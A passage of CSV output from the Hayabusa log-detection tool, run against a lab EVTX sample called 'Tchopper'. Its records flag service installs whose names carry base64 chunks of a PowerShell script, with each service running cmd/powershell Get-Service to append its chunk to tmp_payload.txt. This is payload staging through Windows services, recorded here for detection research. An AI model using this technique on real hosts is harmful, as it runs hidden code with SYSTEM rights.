ICAgDQogICAgICAgICAgICBpZiAoJENvbXB1dGVyTGlzdFR5cGUgLWVxICRMT0NBTEhPU1RfT1BUKSB7DQogICAgICAgICAgICAgICAgV3JpdGUtTG9nICRJTkZPX0xPRyAiR2V0dGluZyBPUyBJbm | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg101"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:17:40.731 +00:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: ICAgDQogICAgICAgICAgICBpZiAoJENvbXB1dGVyTGlzdFR5cGUgLWVxICRMT0NBTEhPU1RfT1BUKSB7DQogICAgICAgICAgICAgICAgV3JpdGUtTG9nICRJTkZPX0xPRyAiR2V0dGluZyBPUyBJbm | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg101"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:17:42.184 +00:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: Zvcm1hdGlvbiBmb3IgJENvbXB1dGVyIg0KICAgICAgICAgICAgICAgICRPUyA9IChHZXQtV21pT2JqZWN0IFdpbjMyX09wZXJhdGluZ1N5c3RlbSkuQ2FwdGlvbg0KICAgICAgICAgICAgICAgIFdy | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg102"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:17:42.184 +00:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: Zvcm1hdGlvbiBmb3IgJENvbXB1dGVyIg0KICAgICAgICAgICAgICAgICRPUyA9IChHZXQtV21pT2JqZWN0IFdpbjMyX09wZXJhdGluZ1N5c3RlbSkuQ2FwdGlvbg0KICAgICAgICAgICAgICAgIFdy | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg102"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:17:42.184 +00:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: Zvcm1hdGlvbiBmb3IgJENvbXB1dGVyIg0KICAgICAgICAgICAgICAgICRPUyA9IChHZXQtV21pT2JqZWN0IFdpbjMyX09wZXJhdGluZ1N5c3RlbSkuQ2FwdGlvbg0KICAgICAgICAgICAgICAgIFdy | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg102"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:17:43.623 +00:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: aXRlLUxvZyAkSU5GT19MT0cgIiRPUyINCiAgICAgICAgICAgIH0NCiAgICAgICAgICAgIA0KICAgICAgICAgICAgaWYgKCRDb21wdXRlckxpc3RUeXBlIC1lcSAkRE9NQUlOX09QVCkgew0KICAgIC | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg103"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:17:43.623 +00:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: aXRlLUxvZyAkSU5GT19MT0cgIiRPUyINCiAgICAgICAgICAgIH0NCiAgICAgICAgICAgIA0KICAgICAgICAgICAgaWYgKCRDb21wdXRlckxpc3RUeXBlIC1lcSAkRE9NQUlOX09QVCkgew0KICAgIC | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg103"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:17:43.623 +00:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: aXRlLUxvZyAkSU5GT19MT0cgIiRPUyINCiAgICAgICAgICAgIH0NCiAgICAgICAgICAgIA0KICAgICAgICAgICAgaWYgKCRDb21wdXRlckxpc3RUeXBlIC1lcSAkRE9NQUlOX09QVCkgew0KICAgIC | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg103"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:17:45.063 +00:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: AgICAgICAgICAgIFdyaXRlLUxvZyAkSU5GT19MT0cgIkdldHRpbmcgT1MgSW5mb3JtYXRpb24gZm9yICRDb21wdXRlciINCiAgICAgICAgICAgICAgICAjJE9TID0gKEdldC1XbWlPYmplY3QgV2lu | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg104"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:17:45.063 +00:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: AgICAgICAgICAgIFdyaXRlLUxvZyAkSU5GT19MT0cgIkdldHRpbmcgT1MgSW5mb3JtYXRpb24gZm9yICRDb21wdXRlciINCiAgICAgICAgICAgICAgICAjJE9TID0gKEdldC1XbWlPYmplY3QgV2lu | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg104"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:17:45.063 +00:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: AgICAgICAgICAgIFdyaXRlLUxvZyAkSU5GT19MT0cgIkdldHRpbmcgT1MgSW5mb3JtYXRpb24gZm9yICRDb21wdXRlciINCiAgICAgICAgICAgICAgICAjJE9TID0gKEdldC1XbWlPYmplY3QgV2lu | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg104"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:17:46.517 +00:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: MzJfT3BlcmF0aW5nU3lzdGVtIC1jb21wdXRlcm5hbWUgJENvbXB1dGVyIC1DcmVkZW50aWFsICRHbG9iYWw6Q3JlZCkuQ2FwdGlvbg0KDQogICAgICAgICAgICAgICAgJEdldEFEQ29tcHV0ZXJMaX | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg105"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:17:46.517 +00:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: MzJfT3BlcmF0aW5nU3lzdGVtIC1jb21wdXRlcm5hbWUgJENvbXB1dGVyIC1DcmVkZW50aWFsICRHbG9iYWw6Q3JlZCkuQ2FwdGlvbg0KDQogICAgICAgICAgICAgICAgJEdldEFEQ29tcHV0ZXJMaX | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg105"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:17:46.517 +00:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: MzJfT3BlcmF0aW5nU3lzdGVtIC1jb21wdXRlcm5hbWUgJENvbXB1dGVyIC1DcmVkZW50aWFsICRHbG9iYWw6Q3JlZCkuQ2FwdGlvbg0KDQogICAgICAgICAgICAgICAgJEdldEFEQ29tcHV0ZXJMaX | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg105"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:17:48.122 +00:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: N0ID0gR2V0LUFEQ29tcHV0ZXIgLUNyZWRlbnRpYWwgJEdsb2JhbDpDcmVkIC1GaWx0ZXIge2VuYWJsZWQgLWVxICJ0cnVlIn0gLVByb3BlcnRpZXMgT3BlcmF0aW5nU3lzdGVtIHwgU2VsZWN0IERO | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg106"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:17:48.122 +00:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: N0ID0gR2V0LUFEQ29tcHV0ZXIgLUNyZWRlbnRpYWwgJEdsb2JhbDpDcmVkIC1GaWx0ZXIge2VuYWJsZWQgLWVxICJ0cnVlIn0gLVByb3BlcnRpZXMgT3BlcmF0aW5nU3lzdGVtIHwgU2VsZWN0IERO | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg106"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:17:48.122 +00:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: N0ID0gR2V0LUFEQ29tcHV0ZXIgLUNyZWRlbnRpYWwgJEdsb2JhbDpDcmVkIC1GaWx0ZXIge2VuYWJsZWQgLWVxICJ0cnVlIn0gLVByb3BlcnRpZXMgT3BlcmF0aW5nU3lzdGVtIHwgU2VsZWN0IERO | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg106"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:17:49.575 +00:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: U0hvc3RuYW1lLCBPcGVyYXRpbmdTeXN0ZW0NCg0KICAgICAgICAgICAgICAgICMkR2V0QURPUyA9IEdldC1BRENvbXB1dGVyIC1DcmVkZW50aWFsICRHbG9iYWw6Q3JlZCAtRmlsdGVyIHtlbmFibG | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg107"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:17:49.575 +00:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: U0hvc3RuYW1lLCBPcGVyYXRpbmdTeXN0ZW0NCg0KICAgICAgICAgICAgICAgICMkR2V0QURPUyA9IEdldC1BRENvbXB1dGVyIC1DcmVkZW50aWFsICRHbG9iYWw6Q3JlZCAtRmlsdGVyIHtlbmFibG | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg107"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:17:49.575 +00:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: U0hvc3RuYW1lLCBPcGVyYXRpbmdTeXN0ZW0NCg0KICAgICAgICAgICAgICAgICMkR2V0QURPUyA9IEdldC1BRENvbXB1dGVyIC1DcmVkZW50aWFsICRHbG9iYWw6Q3JlZCAtRmlsdGVyIHtlbmFibG | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg107"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:17:51.015 +00:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: VkIC1lcSAidHJ1ZSJ9IC1Qcm9wZXJ0aWVzIE9wZXJhdGluZ1N5c3RlbSB8IFNlbGVjdCANCiAgICAgICAgICAgICAgICANCiAgICAgICAgICAgICAgICAjJENvbXB1dGVyTGlzdCA9ICRHZXRBRENv | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg108"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:17:51.015 +00:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: VkIC1lcSAidHJ1ZSJ9IC1Qcm9wZXJ0aWVzIE9wZXJhdGluZ1N5c3RlbSB8IFNlbGVjdCANCiAgICAgICAgICAgICAgICANCiAgICAgICAgICAgICAgICAjJENvbXB1dGVyTGlzdCA9ICRHZXRBRENv | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg108"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:17:51.015 +00:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: VkIC1lcSAidHJ1ZSJ9IC1Qcm9wZXJ0aWVzIE9wZXJhdGluZ1N5c3RlbSB8IFNlbGVjdCANCiAgICAgICAgICAgICAgICANCiAgICAgICAgICAgICAgICAjJENvbXB1dGVyTGlzdCA9ICRHZXRBRENv | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg108"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:17:52.463 +00:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: bXB1dGVyTGlzdC5ETlNIb3N0TmFtZQ0KDQoNCiAgICAgICAgICAgICAgICAkT1MgPSAoJEdldEFEQ29tcHV0ZXJMaXN0IC1tYXRjaCAkQ29tcHV0ZXIpLk9wZXJhdGluZ1N5c3RlbQ0KICAgICAgIC | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg109"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:17:52.463 +00:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: bXB1dGVyTGlzdC5ETlNIb3N0TmFtZQ0KDQoNCiAgICAgICAgICAgICAgICAkT1MgPSAoJEdldEFEQ29tcHV0ZXJMaXN0IC1tYXRjaCAkQ29tcHV0ZXIpLk9wZXJhdGluZ1N5c3RlbQ0KICAgICAgIC | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg109"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:17:52.463 +00:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: bXB1dGVyTGlzdC5ETlNIb3N0TmFtZQ0KDQoNCiAgICAgICAgICAgICAgICAkT1MgPSAoJEdldEFEQ29tcHV0ZXJMaXN0IC1tYXRjaCAkQ29tcHV0ZXIpLk9wZXJhdGluZ1N5c3RlbQ0KICAgICAgIC | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg109"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:17:53.917 +00:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: AgICAgICAgIFdyaXRlLUxvZyAkSU5GT19MT0cgIiRPUyINCiAgICAgICAgICAgIH0gDQogICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAg | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg110"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:17:53.917 +00:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: AgICAgICAgIFdyaXRlLUxvZyAkSU5GT19MT0cgIiRPUyINCiAgICAgICAgICAgIH0gDQogICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAg | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg110"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:17:53.917 +00:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: AgICAgICAgIFdyaXRlLUxvZyAkSU5GT19MT0cgIiRPUyINCiAgICAgICAgICAgIH0gDQogICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAg | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg110"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:17:55.362 +00:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: ICAgICAgICAgICAgICAgICANCiAgICAgICAgICAgIA0KICAgICAgICAgICAgIyBSZXRyaWV2ZSB0aGUgQXBwbGljYXRpb24gRXZlbnQgbG9nIGluZm8NCiAgICAgICAgICAgICRBcHBsaWNhdGlvbk | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg111"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:17:55.362 +00:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: ICAgICAgICAgICAgICAgICANCiAgICAgICAgICAgIA0KICAgICAgICAgICAgIyBSZXRyaWV2ZSB0aGUgQXBwbGljYXRpb24gRXZlbnQgbG9nIGluZm8NCiAgICAgICAgICAgICRBcHBsaWNhdGlvbk | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg111"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:17:55.362 +00:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: ICAgICAgICAgICAgICAgICANCiAgICAgICAgICAgIA0KICAgICAgICAgICAgIyBSZXRyaWV2ZSB0aGUgQXBwbGljYXRpb24gRXZlbnQgbG9nIGluZm8NCiAgICAgICAgICAgICRBcHBsaWNhdGlvbk | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg111"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:17:56.815 +00:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: luZm8gPSBHZXQtRXZlbnRMb2dJbmZvICRDb21wdXRlciBBcHBsaWNhdGlvbiAkUmVtb3RlQ29tcHV0ZXIgJE9TDQogICAgICAgICAgICAkQXBwbGljYXRpb25FUFMgPSAkQXBwbGljYXRpb25JbmZv | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg112"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:17:56.815 +00:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: luZm8gPSBHZXQtRXZlbnRMb2dJbmZvICRDb21wdXRlciBBcHBsaWNhdGlvbiAkUmVtb3RlQ29tcHV0ZXIgJE9TDQogICAgICAgICAgICAkQXBwbGljYXRpb25FUFMgPSAkQXBwbGljYXRpb25JbmZv | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg112"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:17:56.815 +00:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: luZm8gPSBHZXQtRXZlbnRMb2dJbmZvICRDb21wdXRlciBBcHBsaWNhdGlvbiAkUmVtb3RlQ29tcHV0ZXIgJE9TDQogICAgICAgICAgICAkQXBwbGljYXRpb25FUFMgPSAkQXBwbGljYXRpb25JbmZv | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg112"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:17:58.263 +00:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: LkF2ZXJhZ2VFdmVudHMNCiAgICAgICAgICAgICRBcHBsaWNhdGlvbkZpcnN0RXZlbnRUaW1lID0gJEFwcGxpY2F0aW9uSW5mby5TdGFydFRpbWUNCiAgICAgICAgICAgICRBcHBsaWNhdGlvbkxhc3 | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg113"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:17:58.263 +00:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: LkF2ZXJhZ2VFdmVudHMNCiAgICAgICAgICAgICRBcHBsaWNhdGlvbkZpcnN0RXZlbnRUaW1lID0gJEFwcGxpY2F0aW9uSW5mby5TdGFydFRpbWUNCiAgICAgICAgICAgICRBcHBsaWNhdGlvbkxhc3 | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg113"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:17:58.263 +00:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: LkF2ZXJhZ2VFdmVudHMNCiAgICAgICAgICAgICRBcHBsaWNhdGlvbkZpcnN0RXZlbnRUaW1lID0gJEFwcGxpY2F0aW9uSW5mby5TdGFydFRpbWUNCiAgICAgICAgICAgICRBcHBsaWNhdGlvbkxhc3 | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg113"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:17:59.742 +00:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: 